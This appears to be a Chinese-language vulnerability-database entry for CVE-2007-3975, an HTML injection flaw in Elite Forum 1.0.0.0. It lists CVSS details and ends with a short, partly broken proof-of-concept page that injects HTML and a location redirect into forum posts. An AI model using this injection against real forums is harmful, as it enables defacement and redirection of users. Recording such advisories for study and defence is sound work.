关键信息 漏洞名称: Elite Forum Full HTML ENjocter version 1.0.0.0 披露日期: 2007.07.31 报告者: St@rExT 风险等级: 低 远程利用: 可以 CVE编号: CVE-2007-3975 CWE编号: CWE-Other CVSS基础评分: 4.3/10 攻击向量: 远程 攻击复杂度: 中等 身份验证: 不需要 影响子评分公司: - 完整性影响: 部分 - 可用性影响: 无 - 机密性影响: 无 漏洞利用示例 ```html Elite Forum FULL HTML ENjocter-By St@rExT body{ background:url(http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7ufo.jpg); color:FFFFFF; font-weight:bold; } input{ background-color:darkred; color:FFFFFF; font-weight:bold; } Elite Forum FULL HTML ENjocter-By St@rExT Your HTML C0de : location="http://yourindex.html"' >Forum Messages: <input cols=2 rows=1 name="post" value='Bug On!!!'>